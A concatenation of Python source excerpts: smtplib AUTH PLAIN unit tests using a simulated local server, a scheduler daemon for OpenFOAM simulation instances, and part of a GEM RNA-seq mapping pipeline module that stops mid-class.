        self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
        self.assertEqual(self.serv.last_message.decode(), expected)
        self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
        self.assertIn('SMTPUTF8', self.serv.last_mail_options)
        self.assertEqual(self.serv.last_rcpt_options, [])
# Base64 encoding of the NUL-delimited AUTH PLAIN credentials
# b'\0psu\0doesnotexist' (empty authzid, user 'psu', password
# 'doesnotexist'); eol='' drops the trailing newline so the value can be
# compared directly against the argument of the AUTH command.
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
    """Channel that only accepts AUTH PLAIN with an initial-response."""

    def smtp_AUTH(self, arg):
        # RFC 4954's AUTH command allows for an optional initial-response.
        # Not all AUTH methods support this; some require a challenge. AUTH
        # PLAIN does those, so test that here. See issue #15014.
        args = arg.split()
        if args[0].lower() == 'plain':
            if len(args) == 2:
                # AUTH PLAIN <initial-response> with the response base 64
                # encoded. Hard code the expected response for the test.
                if args[1] == EXPECTED_RESPONSE:
                    self.push('235 Ok')
                    return
        # Anything else (wrong mechanism, missing or wrong initial
        # response) is rejected.
        self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
    """Simulated server whose channel enforces AUTH PLAIN initial-response."""
    channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
    """Tests for AUTH PLAIN with an RFC 4954 initial-response (issue #15014)."""

    def setUp(self):
        self.thread_key = threading_setup()
        # Avoid real DNS lookups from the test suite.
        self.real_getfqdn = socket.getfqdn
        socket.getfqdn = mock_socket.getfqdn
        self.serv_evt = threading.Event()
        self.client_evt = threading.Event()
        # Pick a random unused port by passing 0 for the port number
        self.serv = SimSMTPAUTHInitialResponseServer(
            (HOST, 0), ('nowhere', -1), decode_data=True)
        # Keep a note of what port was assigned
        self.port = self.serv.socket.getsockname()[1]
        serv_args = (self.serv, self.serv_evt, self.client_evt)
        self.thread = threading.Thread(target=debugging_server, args=serv_args)
        self.thread.start()

        # wait until server thread has assigned a port number
        self.serv_evt.wait()
        self.serv_evt.clear()

    def tearDown(self):
        socket.getfqdn = self.real_getfqdn
        # indicate that the client is finished
        self.client_evt.set()
        # wait for the server thread to terminate
        self.serv_evt.wait()
        join_thread(self.thread)
        del self.thread
        self.doCleanups()
        threading_cleanup(*self.thread_key)

    def testAUTH_PLAIN_initial_response_login(self):
        # login() must send the initial-response form and succeed.
        self.serv.add_feature('AUTH PLAIN')
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
                            timeout=support.LOOPBACK_TIMEOUT)
        smtp.login('psu', 'doesnotexist')
        smtp.close()

    def testAUTH_PLAIN_initial_response_auth(self):
        # Driving auth() directly must also use the initial-response form.
        self.serv.add_feature('AUTH PLAIN')
        smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
                            timeout=support.LOOPBACK_TIMEOUT)
        smtp.user = 'psu'
        smtp.password = 'doesnotexist'
        code, response = smtp.auth('plain', smtp.auth_plain)
        smtp.close()
        self.assertEqual(code, 235)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
scheduler_daemon.py
|
# Copyright (C) 2015-2017 XLAB, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import signal
import threading
import time
import traceback
from importlib import import_module
import daemon
import daemon.pidfile
from django.conf import settings
import utils
from ofcloud.models import Instance
def do_work(sleep_interval):
    """Main daemon loop.

    Initializes Django, instantiates one simulation provider per entry in
    settings.PROVIDER_CONFIG, then every ``sleep_interval`` seconds makes
    sure one worker thread per polling concern (shutdown, reconstruct,
    run, prepare) is alive, restarting any that has finished or died.
    Never returns.

    :param sleep_interval: seconds to sleep between polling rounds
    """
    import django
    django.setup()
    # create providers
    simulation_providers = []
    for provider_config in settings.PROVIDER_CONFIG:
        # TYPE is a dotted path, e.g. 'some.package.ProviderClass'.
        package, module = provider_config.get('TYPE').rsplit('.', 1)
        mod = import_module(package)
        provider = getattr(mod, module)
        simulation_providers.append(provider(provider_config.get('NAME'), provider_config))
    # One slot per polling concern; each holds the currently running thread.
    threads = {
        'shutdown': None,
        'reconstruct': None,
        'run': None,
        'prepare': None
    }
    while True:
        # NOTE: Thread.isAlive() is the pre-Python-3.9 spelling; this file
        # targets Python 2 (print statements elsewhere), where it is valid.
        if not threads['shutdown'] or not threads['shutdown'].isAlive():
            threads['shutdown'] = threading.Thread(target=__poll_for_shutdown, args=(simulation_providers,))
            threads['shutdown'].start()
        if not threads['reconstruct'] or not threads['reconstruct'].isAlive():
            threads['reconstruct'] = threading.Thread(target=__poll_for_reconstruction, args=(simulation_providers,))
            threads['reconstruct'].start()
        if not threads['run'] or not threads['run'].isAlive():
            threads['run'] = threading.Thread(target=__poll_for_run, args=(simulation_providers,))
            threads['run'].start()
        if not threads['prepare'] or not threads['prepare'].isAlive():
            threads['prepare'] = threading.Thread(target=__poll_for_prepare, args=(simulation_providers,))
            threads['prepare'].start()
        time.sleep(sleep_interval)
def __poll_for_shutdown(simulation_providers):
    """
    Polls instances ready for shutdown.

    Instances qualify for shutdown if they are either in Instance.Status.RUNNING or Instance.Status.RECONSTRUCTING
    state and the openFOAM thread is terminated. Orphaned instances are sent to Instance.Status.COMPLETE state.

    :param simulation_providers: list of provider objects to poll
    :return: None
    """
    print "Polling instances for shutdown"
    for provider in simulation_providers:
        provider_id = provider.get_provider_id()
        print "Using provider %s" % provider_id
        # Split DB instances into those the provider still knows about and
        # those it has lost track of (orphans).
        running_instances, orphans_1 = provider.split_running_and_orphaned_instances(
            Instance.objects.filter(status=Instance.Status.RUNNING.name, provider=provider_id))
        reconstructing_instances, orphans_2 = provider.split_running_and_orphaned_instances(
            Instance.objects.filter(status=Instance.Status.RECONSTRUCTING.name, provider=provider_id))
        orphaned_instances = orphans_1 + orphans_2
        # Mark any orphaned instance objects as complete
        utils.update_instance_status(orphaned_instances, Instance.Status.COMPLETE.name)
        finished_instances = utils.get_instances_with_finished_openfoam_thread(
            running_instances + reconstructing_instances)
        # Only log the counters when there is actually something going on.
        if len(finished_instances) or len(running_instances) or len(orphaned_instances):
            print "Running/Finished/Orphaned: %d/%d/%d" % (
                len(running_instances), len(finished_instances), len(orphaned_instances))
        provider.shutdown_instances(finished_instances)
        utils.update_instance_status(finished_instances, Instance.Status.COMPLETE.name)
def __poll_for_reconstruction(simulation_providers):
    """
    Polls instances ready for reconstruction and runs reconstructPar command on them.

    Instances qualify for reconstruction if they are in Instance.Status.RUNNING_MPI state and the openFOAM thread
    is terminated. Orphaned instances are sent to Instance.Status.COMPLETE state.

    :param simulation_providers: list of provider objects to poll
    :return: None
    """
    print "Polling instances for reconstruction"
    for provider in simulation_providers:
        provider_id = provider.get_provider_id()
        print "Using provider %s" % provider_id
        running_mpi_instances, orphaned_instances = provider.split_running_and_orphaned_instances(
            Instance.objects.filter(status=Instance.Status.RUNNING_MPI.name, provider=provider_id))
        # Orphans cannot be reconstructed any more - close them out.
        utils.update_instance_status(orphaned_instances, Instance.Status.COMPLETE.name)
        ready_for_reconstruction = utils.get_instances_with_finished_openfoam_thread(running_mpi_instances)
        for instance in ready_for_reconstruction:
            provider.run_reconstruction(instance)
def __poll_for_prepare(simulation_providers):
    """
    Polls instances ready for preparation of openFOAM.

    Instances qualify for preparation if they are in Instance.Status.PENDING state.

    :param simulation_providers: list of provider objects to choose from
    :return: None
    """
    print "Polling instances for preparation"
    pending_instances = Instance.objects.filter(status=Instance.Status.PENDING.name)
    print('Found %d instances in PENDING state.' % len(pending_instances))
    for instance in pending_instances:
        utils.prepare_simulation_instance(instance, simulation_providers)
def __poll_for_run(simulation_providers):
    """
    Polls instances ready to run openFOAM simulations.

    Instances qualify for running if they are in Instance.Status.READY state or in Instance.Status.DECOMPOSING state
    with openFOAM thread terminated.

    :param simulation_providers: list of provider objects to dispatch to
    :return: None
    """
    # Promote finished DECOMPOSING instances to READY first, so they are
    # picked up by the READY query below (possibly in the same round).
    decomposing_instances = Instance.objects.filter(status=Instance.Status.DECOMPOSING.name)
    finished_decomposing_instances = utils.get_instances_with_finished_openfoam_thread(decomposing_instances)
    utils.update_instance_status(finished_decomposing_instances, Instance.Status.READY.name)
    print "Polling instances for run simulation"
    ready_instances = Instance.objects.filter(status=Instance.Status.READY.name)
    print('Found %d instances in READY state.' % len(ready_instances))
    for ready_instance in ready_instances:
        # NOTE(review): the other pollers match providers through
        # get_provider_id(); here `provider.id` is used instead - confirm
        # both yield the same value.  Also, instance_provider[0] raises
        # IndexError when no provider matches (e.g. an orphaned READY
        # instance) - TODO confirm this is intended to crash the thread.
        instance_provider = [provider for provider in simulation_providers if
                             provider.id == ready_instance.provider]
        instance_provider[0].run_simulation(ready_instance)
def __kill_and_wait(pid):
    """Send SIGTERM to *pid* and block until the process is gone.

    Liveness is probed once per second with ``os.kill(pid, 0)``; signal 0
    performs only the existence/permission check and delivers nothing.
    If the process is still alive, it is escalated to SIGKILL every
    further 10 seconds.  Returns as soon as the probe raises ``OSError``,
    i.e. the process no longer exists.

    :param pid: process id to terminate
    """
    os.kill(pid, signal.SIGTERM)
    seconds_waited = 0
    while True:
        try:
            time.sleep(1)
            # Existence probe.  The original code passed signal.SIG_DFL
            # here, which only worked because SIG_DFL happens to equal 0;
            # signal number 0 is the documented "check only" value.
            os.kill(pid, 0)
            seconds_waited += 1
            # Sometimes the process does not go down gracefully; try to
            # kill it hard every 10 seconds.
            if seconds_waited % 10 == 0:
                os.kill(pid, signal.SIGKILL)
        except OSError:
            # Process has exited (or was never there) - we are done.
            return
def run(sleep_interval):
    """Start the scheduler daemon, unless one is already running.

    Uses a PID lock file under /tmp to enforce a single instance; a stale
    lock (no live process behind the recorded pid) is broken and the
    daemon started anyway.  Daemon stdout/stderr go to timestamped log
    files in /tmp.

    :param sleep_interval: polling interval passed on to do_work()
    """
    pidfile = daemon.pidfile.PIDLockFile(path="/tmp/scheduler_daemon.pid")
    if pidfile.is_locked():
        print "Existing lock file found"
        try:
            # Signal 0 (SIG_DFL == 0): probe whether the recorded pid is alive.
            os.kill(pidfile.read_pid(), signal.SIG_DFL)
            print "An instance of scheduler daemon is already running. If you wish to restart, use the 'restart' " \
                  "command"
            return
        except:
            # No live process behind the lock -> stale lock, remove it.
            pidfile.break_lock()
    now_seconds = str(time.time())
    stdout = open("/tmp/scheduler_daemon_%s.log" % now_seconds, "w+")
    stderr = open("/tmp/scheduler_daemon_error_%s.log" % now_seconds, "w+")
    print "Running scheduler daemon with refresh interval of %s seconds" % sleep_interval
    daemon_context = daemon.DaemonContext(stdout=stdout,
                                          stderr=stderr,
                                          detach_process=True,
                                          pidfile=pidfile,
                                          working_directory=os.getcwd())
    with daemon_context:
        do_work(sleep_interval)
def shutdown():
    """Stop a running scheduler daemon, if any.

    :return: 1 when a daemon was found and terminated, 0 when nothing was
        running (stale locks are broken).  NOTE(review): when
        __kill_and_wait itself fails with OSError, the traceback is
        printed and the function falls through returning None (falsy),
        which callers treat like "not running" - confirm intended.
    """
    pidfile = daemon.pidfile.PIDLockFile(path="/tmp/scheduler_daemon.pid")
    if pidfile.is_locked():
        pid = pidfile.read_pid()
        try:
            # Signal 0 (SIG_DFL == 0): probe whether the pid is alive.
            os.kill(pid, signal.SIG_DFL)
        except OSError:
            print "There doesn't seem to be any instance of scheduler daemon running but the lock file exists"
            print "Breaking lock file"
            pidfile.break_lock()
            return 0
        try:
            print "Shutting down scheduler daemon (%d)" % pid
            __kill_and_wait(pid)
            pidfile.break_lock()
            print "Scheduler daemon (%d) successfully terminated" % pid
            return 1
        except OSError:
            print traceback.format_exc()
    else:
        print "There doesn't seem to be any instance of scheduler daemon running"
        return 0
def restart(sleep_interval):
    """Restart the scheduler daemon: shut it down, then start it again.

    A new daemon is only started when shutdown() reports it actually
    terminated one (returns 1); otherwise the user is told to start one
    explicitly.

    :param sleep_interval: polling interval passed on to run()
    """
    print "Restarting scheduler daemon with refresh interval of %s seconds" % sleep_interval
    shutdown_status = shutdown()
    if shutdown_status == 1:
        run(sleep_interval)
    else:
        print "To start a new instance use the 'runscheduler' command"
|
pipeline.py
|
#!/usr/bin/env
"""Pipeline utilities"""
import gem
import json
import logging
import os
import errno
import signal
import traceback
from gem.utils import Timer
import gem.gemtools as gt
import gem.filter
import gem.utils
class dotdict(dict):
    """A dict whose keys are also reachable as attributes.

    Attribute reads fall back to ``dict.get``, so a missing key yields
    ``None`` instead of raising ``AttributeError``.  Attribute writes and
    deletes map straight onto item assignment/deletion.
    """

    __setattr__ = dict.__setitem__
    __delattr__ = dict.__delitem__

    def __getattr__(self, name):
        # Only invoked when normal attribute lookup fails, i.e. for keys.
        return self.get(name, None)
class PipelineError(Exception):
    """Exception thrown by the mapping pipeline.

    :param message: human-readable description of the failure
    """
    def __init__(self, message):
        # BUG FIX: the original never called Exception.__init__, so
        # str(exc) and exc.args were empty and the message was lost in
        # tracebacks/logs.  Chaining to the base class fixes that while
        # keeping the legacy ``.message`` attribute for existing callers.
        super(PipelineError, self).__init__(message)
        self.message = message
class PipelineStep(object):
    """General mapping pipeline step.

    A step knows its name, its dependencies (ids of other steps), whether
    it produces a final (kept) result, and which output files it creates.
    Subclasses implement :meth:`run` and, when they produce something other
    than a single .map file, override :meth:`files`.
    """

    def __init__(self, name, dependencies=None, final=False, description="",
                 name_suffix=None, file_suffix=None):
        self.id = None  # step id, assigned by the pipeline in prepare()
        self.name = name
        self.name_suffix = name_suffix  # extra tag inserted into file names
        self.file_suffix = file_suffix  # file extension override
        self.description = description
        self.pipeline = None  # owning pipeline, set in prepare()
        self.dependencies = []  # ids of steps whose output feeds this one
        self._files = None  # lazily built list of output file names
        self.configuration = None  # step configuration dict, set in prepare()
        self.final = final  # final outputs survive cleanup()
        if dependencies is not None:
            self.dependencies.extend(dependencies)

    def prepare(self, id, pipeline, configuration):
        """Implement this to prepare the step"""
        self.pipeline = pipeline
        self.id = id
        self.configuration = configuration
        # initialize files
        self.files()

    def run(self, final=False):
        """Implement this method to execute the step"""
        pass

    def cleanup(self, force=False):
        # Remove this step's output files unless they are final results
        # (or the pipeline keeps temporary files); force overrides both.
        if force or (not self.final and self.pipeline.remove_temp):
            for f in self.files():
                if os.path.exists(f):
                    logging.gemtools.debug("Remove temporary file %s" % f)
                    os.remove(f)

    def files(self):
        """Return the output files generated by this step.
        By default one .map output file is generated
        """
        if self._files is None:
            self._files = []
            self._files.append(self.pipeline.create_file_name(self.name,
                               name_suffix=self.name_suffix,
                               file_suffix=self.file_suffix,
                               final=self.final))
        return self._files

    def _compress(self):
        """Returns true if this step needs compression for
        all output
        """
        return self.pipeline.compress_all

    def _output(self):
        """Return the output file if its not final
        step, otherwise return none
        """
        if self.final:
            return None
        else:
            return self._final_output()

    def _final_output(self):
        """Return the last file created by this step"""
        return self.files()[-1]

    def _input(self, raw=False):
        """Return pipeline input if this step
        has no dependencies or the
        output of the last dependency
        """
        if self.dependencies is None or len(self.dependencies) == 0:
            return self.pipeline.open_input()
        return self.pipeline.open_step(self.dependencies[-1], raw=raw)

    def open(self, raw=False):
        """Open the steps output. The default implementation
        opens the last file"""
        fs = self.files()
        if len(fs) > 0:
            if raw:
                # raw mode returns the file name rather than an open stream
                logging.gemtools.debug("Returning raw step %s output : %s", self.name, fs[-1])
                return fs[-1]
            else:
                logging.gemtools.debug("Opening step %s output : %s", self.name, fs[-1])
                return gem.files.open(fs[-1])
        else:
            logging.error("Step does not produce output files! Unable to open output")
            return None

    def is_done(self):
        """Return true if this step is done and
        does not need execution
        The basic implementation checks if all files exists
        """
        for f in self.files():
            if not os.path.exists(f):
                return False
        return True
class PrepareInputStep(PipelineStep):
    """Prepare multiple input files,
    clean ids and write uncompressd file
    """

    def files(self):
        # Single output: an uncompressed .gt.fastq file.
        if self._files is None:
            self._files = []
            self._files.append(self.pipeline.create_file_name(self.name, file_suffix="gt.fastq", final=self.final))
        return self._files

    def __write(self):
        # Helper kept for the (disabled) multiprocessing variant below;
        # identical to the body of run().
        outfile = gt.OutputFile(self._final_output(), clean_id=self.configuration['paired'], append_extra=False)
        infile = self._input()
        infile.write_stream(outfile, write_map=False)
        infile.close()
        outfile.close()

    def run(self):
        """Merge current set of mappings and delete last ones"""
        # p = mp.Process(target=PrepareInputStep.__write, args=(self,))
        # p.start()
        # p.join()
        # Stream the pipeline input into the prepared fastq file,
        # normalizing read ids when the data is paired.
        outfile = gt.OutputFile(self._final_output(), clean_id=self.configuration['paired'], append_extra=False)
        infile = self._input()
        infile.write_stream(outfile, write_map=False)
        infile.close()
        outfile.close()
class MergeStep(PipelineStep):
    """Merge up to the current step"""

    def run(self):
        """Merge current set of mappings and delete last ones"""
        same_content = self.configuration.get("same_content", True)
        inputs = self._input()
        # First dependency output is the master; the rest are merged into it.
        master = inputs[0]
        slaves = inputs[1:]
        mapping = gem.merge(master, slaves, output=self._output(),
                            threads=self.pipeline.threads,
                            same_content=same_content,
                            paired=False,
                            compress=self._compress())
        if self.final:
            # Final steps additionally score/filter into the kept output.
            # NOTE: threads / 2 is integer division under Python 2.
            gem.score(mapping, self.configuration["index"], self._final_output(),
                      filter=self.pipeline.filter,
                      threads=max(2, self.pipeline.threads / 2),
                      quality=self.pipeline.quality,
                      compress=self.pipeline.compress
                      )

    def _input(self):
        """Return the output of all
        dependencies"""
        if not self.dependencies:
            raise PipelineError("You have to specify what to merge!")
        return [self.pipeline.open_step(i) for i in self.dependencies if i >= 0]
class FilterStep(PipelineStep):
    """Filter the result mapping"""

    def files(self):
        # Single output: <name>.filtered.map
        if self._files is None:
            self._files = []
            self._files.append(
                self.pipeline.create_file_name(
                    self.name,
                    name_suffix=".filtered",
                    file_suffix="map",
                    final=self.final))
        return self._files

    def run(self):
        # Apply the RNA-seq filter chain; annotation-based filters
        # (gene pairing, junction filter) are enabled only when an
        # annotation is configured.
        cfg = self.configuration
        inputs = self._input()
        gem.filter.rnaseq_filter(
            inputs,
            output=self._final_output(),
            compress=self.pipeline.compress,
            annotation=cfg['annotation'],
            min_intron=cfg['min_intron'],
            min_block=cfg['min_block'],
            max_strata=cfg['max_strata'],
            level=cfg['level'],
            max_multi_maps=cfg['max_multi_maps'],
            gene_pairing=cfg['filter_annotation'] if cfg['annotation'] is not None else False,
            junction_filter=cfg['filter_annotation'] if cfg['annotation'] is not None else False,
            threads=self.pipeline.threads,
            keep_unique=True,
        )
class MergeAndPairStep(PipelineStep):
    """Do merging and pairing in one single step"""

    def run(self):
        cfg = self.configuration
        same_content = self.configuration.get("same_content", True)
        inputs = self._input()
        # First dependency output is the master; the rest are merged into it.
        master = inputs[0]
        slaves = inputs[1:]
        # Merge in a stream (output=None) and feed it straight into the
        # pair-aligner; thread budget is split between the two stages.
        # NOTE: threads / 2 is integer division under Python 2.
        mapping = gem.merge(master, slaves, output=None,
                            threads=max(1, self.pipeline.threads / 2),  # self.pipeline.threads,
                            same_content=same_content,
                            paired=False,
                            compress=self._compress())
        pair_mapping = gem.pairalign(
            mapping,
            cfg["index"],
            self._output(),
            quality_threshold=cfg["quality_threshold"],
            max_decoded_matches=cfg["max_decoded_matches"],
            min_decoded_strata=cfg["min_decoded_strata"],
            min_insert_size=cfg["min_insert_size"],
            max_insert_size=cfg["max_insert_size"],
            max_edit_distance=cfg["max_edit_distance"],
            min_matched_bases=cfg["min_matched_bases"],
            max_extendable_matches=cfg["max_extendable_matches"],
            max_matches_per_extension=cfg["max_matches_per_extension"],
            threads=max(1, self.pipeline.threads / 2),  # self.pipeline.threads,
            filter_max_matches=0,
            quality=self.pipeline.quality,
            compress=self._compress())
        if self.final:
            # Final steps additionally score/filter into the kept output.
            gem.score(pair_mapping, cfg["index"], self._final_output(),
                      filter=self.pipeline.filter,
                      threads=max(1, self.pipeline.threads / 2),
                      quality=self.pipeline.quality,
                      compress=self.pipeline.compress,
                      raw=True)

    def _input(self):
        """Return the output of all
        dependencies"""
        if not self.dependencies:
            raise PipelineError("You have to specify what to merge!")
        return [self.pipeline.open_step(i) for i in self.dependencies if i >= 0]
class CreateStatsStep(PipelineStep):
    """Create stats file"""

    def files(self):
        # Two outputs: <name><suffix>.stats.txt and <name><suffix>.stats.json
        if self._files is None:
            self._files = []
            s = self.name_suffix if self.name_suffix is not None else ""
            self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.stats" % s, file_suffix="txt", final=self.final))
            self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.stats" % s, file_suffix="json", final=self.final))
        return self._files

    def run(self):
        cfg = self.configuration
        outputs = self.files()
        infile = self._input()
        # outputs[0] is the text report, outputs[1] the JSON report.
        gem.stats(infile, output=outputs[0], json_output=outputs[1],
                  paired=cfg['paired'],
                  threads=self.pipeline.threads)
class CreateGtfStatsStep(PipelineStep):
    """Create gtf stats file"""

    def files(self):
        # Three outputs: gene counts (txt), stats (json), stats (txt);
        # the last one is the step's "final" output.
        if self._files is None:
            self._files = []
            s = self.name_suffix if self.name_suffix is not None else ""
            self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.gtf.counts" % s, file_suffix="txt", final=self.final))
            self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.gtf.stats" % s, file_suffix="json", final=self.final))
            self._files.append(self.pipeline.create_file_name(self.name, name_suffix="%s.gtf.stats" % s, file_suffix="txt", final=self.final))
        return self._files

    def run(self):
        cfg = self.configuration
        infile = self._input()
        output = self._final_output()
        gene_counts = self._files[0]
        json_stats = self._files[1]
        counts_weighted = cfg['counts_weighted']
        counts_multimaps = cfg['counts_multimaps']
        counts_exon_threshold = cfg['counts_exon_threshold']
        gem.gtfcounts(infile, cfg['annotation'], output=output,
                      counts=gene_counts, json_output=json_stats,
                      threads=self.pipeline.threads, weight=counts_weighted,
                      multimaps=counts_multimaps, paired=cfg['paired'],
                      coverage=True,
                      exon_threshold=counts_exon_threshold)
class CreateBamStep(PipelineStep):
    """Create BAM file"""

    # def files(self):
    #     if self._files is None:
    #         self._files = []
    #         self._files.append(self.pipeline.create_file_name(self.name, file_suffix="bam", final=self.final))
    #     return self._files

    def run(self):
        cfg = self.configuration
        # Two stages: GEM map -> SAM stream, then SAM -> (sorted) BAM.
        sam = gem.gem2sam(self._input(), cfg["index"],
                          threads=self.pipeline.threads,
                          quality=self.pipeline.quality,
                          consensus=cfg['consensus'],
                          exclude_header=cfg['sam_no_seq_header'],
                          compact=cfg['sam_compact'],
                          single_end=not cfg['paired'],
                          calc_xs=cfg['calc_xs'])
        gem.sam2bam(sam, self._final_output(), sorted=cfg["sort"], mapq=cfg["mapq"], threads=self.pipeline.threads, sort_memory=self.pipeline.sort_memory)
class IndexBamStep(PipelineStep):
    """Index BAM file"""

    # def files(self):
    #     if self._files is None:
    #         self._files = []
    #         self._files.append(self.pipeline.create_file_name(self.name, file_suffix="bam.bai", final=self.final))
    #     return self._files

    def run(self):
        # cfg = self.configuration
        # raw=True gives the BAM file name (not an open stream) to index.
        gem.bamIndex(self._input(raw=True), self._final_output())
class MapStep(PipelineStep):
    """Mapping step"""

    def run(self):
        cfg = self.configuration
        mapping = gem.mapper(
            self._input(),
            cfg["index"],
            self._output(),
            mismatches=cfg["mismatches"],
            quality_threshold=cfg["quality_threshold"],
            max_decoded_matches=cfg["max_decoded_matches"],
            min_decoded_strata=cfg["min_decoded_strata"],
            min_matched_bases=cfg["min_matched_bases"],
            max_big_indel_length=cfg["max_big_indel_length"],
            max_edit_distance=cfg["max_edit_distance"],
            mismatch_alphabet=cfg["mismatch_alphabet"],
            delta=cfg["strata_after_best"],
            trim=cfg["trim"],
            quality=self.pipeline.quality,
            threads=self.pipeline.threads,
            compress=self._compress()
        )
        if self.final:
            # Final steps additionally score/filter into the kept output.
            # NOTE: threads / 2 is integer division under Python 2.
            gem.score(mapping, cfg["index"], self._final_output(),
                      filter=self.pipeline.filter,
                      threads=max(2, self.pipeline.threads / 2),
                      quality=self.pipeline.quality,
                      compress=self.pipeline.compress
                      )
class PairalignStep(PipelineStep):
    """Pairalign"""

    def run(self):
        cfg = self.configuration
        mapping = gem.pairalign(
            self._input(),
            cfg["index"],
            self._output(),
            quality_threshold=cfg["quality_threshold"],
            max_decoded_matches=cfg["max_decoded_matches"],
            min_decoded_strata=cfg["min_decoded_strata"],
            min_insert_size=cfg["min_insert_size"],
            max_insert_size=cfg["max_insert_size"],
            max_edit_distance=cfg["max_edit_distance"],
            min_matched_bases=cfg["min_matched_bases"],
            max_extendable_matches=cfg["max_extendable_matches"],
            max_matches_per_extension=cfg["max_matches_per_extension"],
            threads=self.pipeline.threads,
            quality=self.pipeline.quality,
            compress=self._compress())
        if self.final:
            # Final steps additionally score/filter into the kept output.
            # NOTE: threads / 2 is integer division under Python 2.
            gem.score(mapping, cfg["index"], self._final_output(),
                      filter=self.pipeline.filter,
                      threads=max(2, self.pipeline.threads / 2),
                      quality=self.pipeline.quality,
                      compress=self.pipeline.compress)
class CreateDenovoTranscriptomeStep(PipelineStep):
    """Create denovo transcriptome.

    Extracts de-novo junctions from the input mapping, distance-filters
    them, optionally merges them with annotation junctions, computes the
    corresponding transcriptome and indexes it with GEM.
    """

    def files(self):
        """Return the output files generated by this step.

        Also caches the individual names on the instance
        (index_denovo_out, junctions_out, denovo_keys, denovo_out) so
        run()/cleanup()/is_done() can refer to them by role.
        """
        if self._files is None:
            self._files = []
            index_denovo_out = self.pipeline.create_file_name(self.name, file_suffix="gem")
            junctions_out = self.pipeline.create_file_name(self.name, file_suffix="junctions")
            denovo_out = self.pipeline.create_file_name("", file_suffix="junctions")
            denovo_keys = junctions_out + ".keys"
            self._files.append(index_denovo_out)
            self._files.append(junctions_out)
            self._files.append(junctions_out + ".fa")
            self._files.append(denovo_keys)
            self._files.append(denovo_out)
            # the indexer writes a .log next to the .gem index
            self._files.append(index_denovo_out[:-4] + ".log")
            self.index_denovo_out = index_denovo_out
            self.junctions_out = junctions_out
            self.denovo_keys = denovo_keys
            self.denovo_out = denovo_out
        return self._files

    def run(self):
        """Create the denovo transcriptome.

        :return: tuple (index file name, keys file name)
        :raises PipelineError: when the max read length cannot be computed
        """
        cfg = self.configuration
        (gtf_junctions, junctions_gtf_out) = self.pipeline.gtf_junctions()
        # Extract candidate junctions from the (split-) mapping.
        denovo_junctions = gem.extract_junctions(
            self._input(),
            cfg["index"],
            filter=cfg["filter"],
            splice_consensus=cfg["junctions_consensus"],
            mismatches=cfg["mismatches"],
            threads=self.pipeline.threads,
            strata_after_first=cfg["strata_after_best"],
            coverage=cfg["coverage"],
            min_split=cfg["min_split_length"],
            max_split=cfg["max_split_length"],
            refinement_step_size=cfg["refinement_step_size"],
            min_split_size=cfg["min_split_size"],
            matches_threshold=cfg["matches_threshold"],
            max_junction_matches=cfg["max_junction_matches"],
            annotation=cfg['annotation']
        )
        logging.gemtools.gt("Found Denovo Junctions %d with coverage >= %s" % (len(denovo_junctions), str(cfg["coverage"])))
        # Keep only junctions whose intron length is within [min, max].
        filtered_denovo_junctions = set(gem.junctions.filter_by_distance(denovo_junctions, cfg["min_split_length"], cfg["max_split_length"]))
        logging.gemtools.gt("Denovo junction passing distance filter (min: %d max: %d): %d (%d removed)" % (cfg["min_split_length"], cfg["max_split_length"],
                            len(filtered_denovo_junctions), (len(denovo_junctions) - len(filtered_denovo_junctions))))
        # Always write the pure de-novo set; the merged set goes to junctions_out.
        gem.junctions.write_junctions(filtered_denovo_junctions, self.denovo_out, cfg["index"])
        if gtf_junctions is not None:
            logging.gemtools.gt("Joining with Annotation - denovo: %d annotation: %d" % (len(filtered_denovo_junctions), len(gtf_junctions)))
            junctions = gtf_junctions.union(filtered_denovo_junctions)
            logging.gemtools.gt("Joined Junctions %d" % (len(junctions)))
            gem.junctions.write_junctions(junctions, self.junctions_out, cfg["index"])
        else:
            logging.gemtools.gt("Skipped merging with annotation, denovo junctions: %d" % (len(filtered_denovo_junctions)))
            gem.junctions.write_junctions(filtered_denovo_junctions, self.junctions_out, cfg["index"])
        logging.gemtools.gt("Computing denovo transcriptome")
        # The transcriptome sequences must cover the longest read.
        max_len = self.pipeline.max_read_length
        if max_len <= 0:
            logging.gemtools.gt("Calculating max read length")
            max_len = gem.utils.get_max_read_length(self._input(),
                                                    threads=self.pipeline.threads)
            if max_len < 0:
                # BUG FIX: the original message interpolated the Python 2
                # builtin ``file`` (a type object) - there is no file name
                # in scope here, so it printed "<type 'file'>".
                raise PipelineError("Unable to calculate max read length from input")
            logging.gemtools.gt("Max read length: %d", max_len)
        (denovo_transcriptome, denovo_keys) = gem.compute_transcriptome(max_len, cfg["index"], self.junctions_out, junctions_gtf_out)
        logging.gemtools.gt("Indexing denovo transcriptome")
        gem.index(denovo_transcriptome, self.index_denovo_out, threads=self.pipeline.threads)
        return (self.index_denovo_out, self.denovo_keys)

    def cleanup(self, force=False):
        # Keep the junction/key files even when removing temporaries;
        # only the bulky intermediate files are deleted.
        if force or (not self.final and self.pipeline.remove_temp):
            keep = [self.junctions_out, self.denovo_keys, self.denovo_out]
            for f in self.files():
                if os.path.exists(f) and f not in keep:
                    logging.gemtools.debug("Remove temporary file %s" % f)
                    os.remove(f)

    def is_done(self):
        """Make sure we ignore the log file generated by the indexer"""
        keep = [self.junctions_out, self.denovo_keys, self.denovo_out]
        for f in keep:
            if not os.path.exists(f) and not f.endswith(".log"):
                return False
        return True
class ExtractJunctionsStep(PipelineStep):
